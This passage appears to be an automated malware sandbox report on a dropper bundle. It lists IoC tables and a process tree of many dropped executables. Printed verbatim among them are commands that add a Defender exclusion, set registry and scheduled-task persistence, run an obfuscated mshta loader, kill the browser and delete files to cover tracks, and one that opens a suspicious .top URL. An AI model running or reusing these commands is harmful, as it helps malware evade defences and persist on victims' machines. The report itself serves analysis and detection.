7544	Adorarti.exe.com
7544	Adorarti.exe.com
7544	Adorarti.exe.com
512	Adorarti.exe.com
512	Adorarti.exe.com
512	Adorarti.exe.com

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2172	Explorer.EXE
5164	MicrosoftEdge.exe
6308	MicrosoftEdgeCP.exe
6308	MicrosoftEdgeCP.exe
7048	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 5060	5020	setup_x86_x64_install.exe	76
PID 5020 wrote to memory of 5060	5020	setup_x86_x64_install.exe	76
PID 5020 wrote to memory of 5060	5020	setup_x86_x64_install.exe	76
PID 5060 wrote to memory of 3564	5060	setup_installer.exe	77
PID 5060 wrote to memory of 3564	5060	setup_installer.exe	77
PID 5060 wrote to memory of 3564	5060	setup_installer.exe	77
PID 3564 wrote to memory of 3316	3564	setup_install.exe	80
PID 3564 wrote to memory of 3316	3564	setup_install.exe	80
PID 3564 wrote to memory of 3316	3564	setup_install.exe	80
PID 3564 wrote to memory of 3512	3564	setup_install.exe	81
PID 3564 wrote to memory of 3512	3564	setup_install.exe	81
PID 3564 wrote to memory of 3512	3564	setup_install.exe	81
PID 3564 wrote to memory of 3616	3564	setup_install.exe	82
PID 3564 wrote to memory of 3616	3564	setup_install.exe	82
PID 3564 wrote to memory of 3616	3564	setup_install.exe	82
PID 3564 wrote to memory of 3052	3564	setup_install.exe	83
PID 3564 wrote to memory of 3052	3564	setup_install.exe	83
PID 3564 wrote to memory of 3052	3564	setup_install.exe	83
PID 3564 wrote to memory of 772	3564	setup_install.exe	84
PID 3564 wrote to memory of 772	3564	setup_install.exe	84
PID 3564 wrote to memory of 772	3564	setup_install.exe	84
PID 3564 wrote to memory of 4224	3564	setup_install.exe	86
PID 3564 wrote to memory of 4224	3564	setup_install.exe	86
PID 3564 wrote to memory of 4224	3564	setup_install.exe	86
PID 3616 wrote to memory of 4248	3616	cmd.exe	85
PID 3616 wrote to memory of 4248	3616	cmd.exe	85
PID 3616 wrote to memory of 4248	3616	cmd.exe	85
PID 3564 wrote to memory of 4212	3564	setup_install.exe	87
PID 3564 wrote to memory of 4212	3564	setup_install.exe	87
PID 3564 wrote to memory of 4212	3564	setup_install.exe	87
PID 3564 wrote to memory of 3260	3564	setup_install.exe	88
PID 3564 wrote to memory of 3260	3564	setup_install.exe	88
PID 3564 wrote to memory of 3260	3564	setup_install.exe	88
PID 3316 wrote to memory of 3752	3316	cmd.exe	106
PID 3316 wrote to memory of 3752	3316	cmd.exe	106
PID 3316 wrote to memory of 3752	3316	cmd.exe	106
PID 3512 wrote to memory of 3944	3512	cmd.exe	105
PID 3512 wrote to memory of 3944	3512	cmd.exe	105
PID 3564 wrote to memory of 3212	3564	setup_install.exe	104
PID 3564 wrote to memory of 3212	3564	setup_install.exe	104
PID 3564 wrote to memory of 3212	3564	setup_install.exe	104
PID 3564 wrote to memory of 3452	3564	setup_install.exe	103
PID 3564 wrote to memory of 3452	3564	setup_install.exe	103
PID 3564 wrote to memory of 3452	3564	setup_install.exe	103
PID 3564 wrote to memory of 4460	3564	setup_install.exe	90
PID 3564 wrote to memory of 4460	3564	setup_install.exe	90
PID 3564 wrote to memory of 4460	3564	setup_install.exe	90
PID 3052 wrote to memory of 4056	3052	cmd.exe	89
PID 3052 wrote to memory of 4056	3052	cmd.exe	89
PID 3052 wrote to memory of 4056	3052	cmd.exe	89
PID 3564 wrote to memory of 4024	3564	setup_install.exe	102
PID 3564 wrote to memory of 4024	3564	setup_install.exe	102
PID 3564 wrote to memory of 4024	3564	setup_install.exe	102
PID 3452 wrote to memory of 4084	3452	cmd.exe	91
PID 3452 wrote to memory of 4084	3452	cmd.exe	91
PID 3452 wrote to memory of 4084	3452	cmd.exe	91
PID 3564 wrote to memory of 1008	3564	setup_install.exe	92
PID 3564 wrote to memory of 1008	3564	setup_install.exe	92
PID 3564 wrote to memory of 1008	3564	setup_install.exe	92
PID 4224 wrote to memory of 4520	4224	cmd.exe	93
PID 4224 wrote to memory of 4520	4224	cmd.exe	93
PID 4224 wrote to memory of 4520	4224	cmd.exe	93
PID 772 wrote to memory of 4484	772	cmd.exe	95
PID 772 wrote to memory of 4484	772	cmd.exe	95

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1928

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2172
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3316
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3512
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu219d5fe8cf316.exe
        
        Thu219d5fe8cf316.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\ProgramData\8532126.exe
        
        "C:\ProgramData\8532126.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1988 -s 1976
        8⤵
        Program crash
        
        PID:6896
        
        C:\ProgramData\6765595.exe
        
        "C:\ProgramData\6765595.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3076
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        8⤵
        Executes dropped EXE
        
        PID:3524
        
        C:\ProgramData\4999760.exe
        
        "C:\ProgramData\4999760.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1408
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3616
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21624565bb917a.exe
        
        Thu21624565bb917a.exe
        6⤵
        Executes dropped EXE
        
        PID:4248
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3052
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21a1ef054cac78a.exe
        
        Thu21a1ef054cac78a.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:6640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:772
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu2164f292a11ce.exe
        
        Thu2164f292a11ce.exe
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4484
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21b93295136197.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4224
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21b93295136197.exe
        
        Thu21b93295136197.exe
        6⤵
        Executes dropped EXE
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-UOHC1.tmp\Thu21b93295136197.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOHC1.tmp\Thu21b93295136197.tmp" /SL5="$5004C,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21b93295136197.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of FindShellTrayWindow
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\is-LF5A3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LF5A3.tmp\Setup.exe" /Verysilent
        8⤵
        Executes dropped EXE
        Checks computer location settings
        Checks whether UAC is enabled
        Drops file in Program Files directory
        
        PID:2656
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
        9⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
        10⤵
        Executes dropped EXE
        
        PID:5060
        
        C:\ProgramData\5237727.exe
        
        "C:\ProgramData\5237727.exe"
        11⤵
        Executes dropped EXE
        
        PID:1832
        
        C:\ProgramData\6479669.exe
        
        "C:\ProgramData\6479669.exe"
        11⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:6908
        
        C:\ProgramData\8373014.exe
        
        "C:\ProgramData\8373014.exe"
        11⤵
        Executes dropped EXE
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\Mortician.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c cmd < Cerchia.vsdx
        11⤵
        
        PID:7600
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        12⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
        13⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        Impedire.exe.com I
        13⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        14⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        13⤵
        Runs ping.exe
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
        
        "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
        10⤵
        Checks whether UAC is enabled
        
        PID:5728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
        11⤵
        
        PID:7416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "foradvertising.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:7312
        
        C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"
        10⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\gdgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
        10⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\gdgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
        11⤵
        
        PID:1508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
        10⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/forcecleanup /wintime 1631046640 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        11⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
        10⤵
        
        PID:6052
        
        C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        10⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\is-M4IDK.tmp\IBInstaller_74449.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M4IDK.tmp\IBInstaller_74449.tmp" /SL5="$7042C,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        11⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-HR668.tmp\{app}\microsoft.cab -F:* %ProgramData%
        12⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-HR668.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        13⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
        12⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
        13⤵
        
        PID:5596
        
        C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
        12⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
        12⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\is-HR668.tmp\{app}\vdi_compiler.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HR668.tmp\{app}\vdi_compiler"
        12⤵
        
        PID:8088
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-HR668.tmp\{app}\vdi_compiler.exe"
        13⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        14⤵
        Runs ping.exe
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
        10⤵
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\is-JIPI5.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JIPI5.tmp\vpn.tmp" /SL5="$604B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
        11⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        12⤵
        
        PID:428
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        13⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        12⤵
        
        PID:4896
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        13⤵
        
        PID:64
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        12⤵
        
        PID:1196
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        12⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
        10⤵
        
        PID:856
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631046640 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        11⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet
        10⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631046640 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
        11⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Local\Temp\askinstall45.exe
        
        "C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"
        10⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        11⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        12⤵
        Kills process with taskkill
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"
        10⤵
        
        PID:3616
        
        C:\Users\Admin\Documents\9ApVx7GxtBkuu4ZkFCzofJE4.exe
        
        "C:\Users\Admin\Documents\9ApVx7GxtBkuu4ZkFCzofJE4.exe"
        11⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        12⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Nobile.docm
        12⤵
        
        PID:1844
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        13⤵
        
        PID:7440
        
        C:\Users\Admin\Documents\aw1rG3vI9LII3WZfrJj_kUII.exe
        
        "C:\Users\Admin\Documents\aw1rG3vI9LII3WZfrJj_kUII.exe"
        11⤵
        
        PID:6388
        
        C:\Users\Admin\Documents\Stqcc4T4QpXz6SdZUkOSS9GY.exe
        
        "C:\Users\Admin\Documents\Stqcc4T4QpXz6SdZUkOSS9GY.exe"
        11⤵
        
        PID:3968
        
        C:\Users\Admin\Documents\xptVy9EoR3aHrEOQWBU7Hxr_.exe
        
        "C:\Users\Admin\Documents\xptVy9EoR3aHrEOQWBU7Hxr_.exe"
        11⤵
        
        PID:7036
        
        C:\Users\Admin\Documents\Oko4TKvkcHMEgSQBF1JPuxpN.exe
        
        "C:\Users\Admin\Documents\Oko4TKvkcHMEgSQBF1JPuxpN.exe"
        11⤵
        
        PID:556
        
        C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe
        
        "C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe"
        11⤵
        
        PID:6448
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        12⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\YtJQnIO8oZqIet1THx8pFu0F.exe" ) do taskkill /f -im "%~nxA"
        13⤵
        
        PID:6644
        
        C:\Users\Admin\Documents\t5B1y3HG_JUNEiA5wJ1bjJHU.exe
        
        "C:\Users\Admin\Documents\t5B1y3HG_JUNEiA5wJ1bjJHU.exe"
        11⤵
        
        PID:64
        
        C:\Users\Admin\Documents\t5B1y3HG_JUNEiA5wJ1bjJHU.exe
        
        C:\Users\Admin\Documents\t5B1y3HG_JUNEiA5wJ1bjJHU.exe
        12⤵
        
        PID:6016
        
        C:\Users\Admin\Documents\Qitq12cWVWliOZlYuE9m8_wI.exe
        
        "C:\Users\Admin\Documents\Qitq12cWVWliOZlYuE9m8_wI.exe"
        11⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:5224
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:4788
        
        C:\Users\Admin\Documents\Yf5Vn_B_3PmutRtJa0wLmPJN.exe
        
        "C:\Users\Admin\Documents\Yf5Vn_B_3PmutRtJa0wLmPJN.exe"
        11⤵
        
        PID:5504
        
        C:\Users\Admin\Documents\Yf5Vn_B_3PmutRtJa0wLmPJN.exe
        
        "C:\Users\Admin\Documents\Yf5Vn_B_3PmutRtJa0wLmPJN.exe"
        12⤵
        
        PID:340
        
        C:\Users\Admin\Documents\2E0k1431Kf4e_zBReQdPXgJZ.exe
        
        "C:\Users\Admin\Documents\2E0k1431Kf4e_zBReQdPXgJZ.exe"
        11⤵
        
        PID:5308
        
        C:\Users\Admin\Documents\XLGMKm0O3xV1W8QtImTAkea2.exe
        
        "C:\Users\Admin\Documents\XLGMKm0O3xV1W8QtImTAkea2.exe"
        11⤵
        
        PID:8176
        
        C:\Users\Admin\Documents\vdrKBvIzjZmMxYvVw0mKuRTn.exe
        
        "C:\Users\Admin\Documents\vdrKBvIzjZmMxYvVw0mKuRTn.exe"
        11⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\{5E3EA8BE-6021-4725-A1F5-B6FD8FA8AB6C}\vdrKBvIzjZmMxYvVw0mKuRTn.exe
        
        C:\Users\Admin\AppData\Local\Temp\{5E3EA8BE-6021-4725-A1F5-B6FD8FA8AB6C}\vdrKBvIzjZmMxYvVw0mKuRTn.exe /q"C:\Users\Admin\Documents\vdrKBvIzjZmMxYvVw0mKuRTn.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{5E3EA8BE-6021-4725-A1F5-B6FD8FA8AB6C}" /IS_temp
        12⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\MSIEXEC.EXE
        
        "C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{4175BAA6-49B9-43E5-8B49-E892979E209E}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="vdrKBvIzjZmMxYvVw0mKuRTn.exe"
        13⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\MSI58CA.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\MSI58CA.tmp"
        14⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\MSI58C9.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\MSI58C9.tmp"
        14⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\MSI58A9.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\MSI58A9.tmp"
        14⤵
        
        PID:6788
        
        C:\Users\Admin\Documents\Ca4taY05m5fERlDstuqFXweU.exe
        
        "C:\Users\Admin\Documents\Ca4taY05m5fERlDstuqFXweU.exe"
        11⤵
        
        PID:7172
        
        C:\Users\Admin\Documents\sDY2cz_x_MRN2HFfd1ozJGIk.exe
        
        "C:\Users\Admin\Documents\sDY2cz_x_MRN2HFfd1ozJGIk.exe"
        11⤵
        
        PID:428
        
        C:\Users\Admin\Documents\pyVVLiu9zuSCFSZ_8hfbzcR1.exe
        
        "C:\Users\Admin\Documents\pyVVLiu9zuSCFSZ_8hfbzcR1.exe"
        11⤵
        
        PID:2244
        
        C:\Users\Admin\Documents\3uzzB028TBiBrGxTh2u4J6Mk.exe
        
        "C:\Users\Admin\Documents\3uzzB028TBiBrGxTh2u4J6Mk.exe"
        11⤵
        
        PID:4676
        
        C:\Users\Admin\Documents\3uzzB028TBiBrGxTh2u4J6Mk.exe
        
        "C:\Users\Admin\Documents\3uzzB028TBiBrGxTh2u4J6Mk.exe"
        12⤵
        
        PID:5572
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
        10⤵
        
        PID:4244
        
        C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 100
        11⤵
        Runs ping.exe
        
        PID:5200
        
        C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        9⤵
        Executes dropped EXE
        
        PID:6232
        
        C:\Users\Admin\AppData\Local\Temp\is-PIQ0U.tmp\stats.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PIQ0U.tmp\stats.tmp" /SL5="$20324,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of FindShellTrayWindow
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\is-5NF48.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5NF48.tmp\Setup.exe" /Verysilent
        11⤵
        Executes dropped EXE
        
        PID:6740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        12⤵
        
        PID:8032
        
        C:\Windows\system32\schtasks.exe
        
